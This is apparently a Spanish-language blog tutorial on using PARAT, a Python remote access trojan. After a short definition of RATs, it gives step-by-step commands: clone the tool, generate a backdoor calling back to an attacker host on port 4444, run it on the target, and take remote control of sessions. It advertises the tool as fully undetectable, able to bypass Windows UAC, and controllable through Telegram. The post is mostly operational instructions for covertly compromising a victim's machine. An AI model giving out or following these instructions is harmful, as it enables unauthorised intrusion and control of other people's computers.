Como usar PARAT- Remote Access Trojan (RAT)?
De acuerdo con
especialistas en seguridad informática; un Troyano de Acceso Remoto
(RAT) es un tipo de malware que controla un sistema a través de una
conexión de red remota como por acceso físico. Si bien el uso compartido
de escritorio y la administración remota tienen muchos usos legales,
RAT generalmente se asocia con actividad criminal. Una RAT se instala
sin que la víctima lo sepa y tratará de ocultar su operación a la
víctima y al software de Anti Virus
PARAT es una
herramienta de administración remota basada en Python y socket abierto
con múltiples hilos. Utiliza principalmente Python core y usa IPv4 para
comunicación y autocifrado local y remoto para su privacidad.
PARAT tiene dos intérpretes:
Modo local
Modo remoto
Cuando inicias el PARAT usando Python2 main.py, te redirigen al modo local y allí puedes:
Controlar
opciones locales, cambiar elementos de UI, hacer ediciones, usar shell
unix, establecer puertos de escucha y generar una puerta trasera, por
mencionar algunos, no debemos olvidar que algunos comandos locales están
disponibles en modo remoto.
Puede acceder al modo remoto solo
cuando tiene conexiones conectadas, usando session -c ID reemplazando el
ID con un identificador de objetivos. Aquí el experto en seguridad
cibernética, tiene acceso completo a la máquina de destino y también
puede realizar acciones remotas.
También puede establecer la
contraseña local para el cliente PARAT y las conexiones remotas usar el
algoritmo de cifrado automáticamente.
Aunque existen diferentes y
mejores opciones para manejar la multiplicidad, deciden usar el módulo
de enhebrado para hacer esto. La razón de esta elección es que PARAT es
una herramienta simple y diseñada solo para fines educativos. Dejan de
usar instrumentos más sofisticados en ese aspecto. También es necesario
señalar que puede escuchar puertos diferentes al mismo tiempo utilizando
esta función.
Solo haz estos pasos:
Entran al menú principal de PARAT usando Python2 main.py
Hacer que el uso de la puerta trasera generate -i yourhost.ddns.net -p 4444 -o backdoor.pyw
Ejecutar backdoor.pyw en el objetivo
Jugar con el objetivo en modo remoto, usando sesiones -c 1
También escucha en el puerto usando listen -p your_port
Change log:
Compatible con las versiones de Python 2 y 3 Copie y pegue en su terminal:
git clone https://github.com/micle-fm/Parat&& cd Parat && python main.py
Puede necesitar instalar python -m easy_install pypiwin32 en algunos destinos.
Características
Totalmente indetectable (FUD)
Compatible con Telegram Messenger
Windows Bypass Control de cuenta de usuario (UAC)
Ejecución de memoria
No hay requisitos para configurar
Telegram
Puede comunicar PARAT usando telegram messanger. Para esto haz los pasos:
Abra el archivo telegram.service en un editor
Inserta tu token de bot en la línea 15, reemplazado en YOUR_BOT_TOKEN
Ejecute telegram.service escribiendo: python telegram.service

No hay comentarios:
Publicar un comentario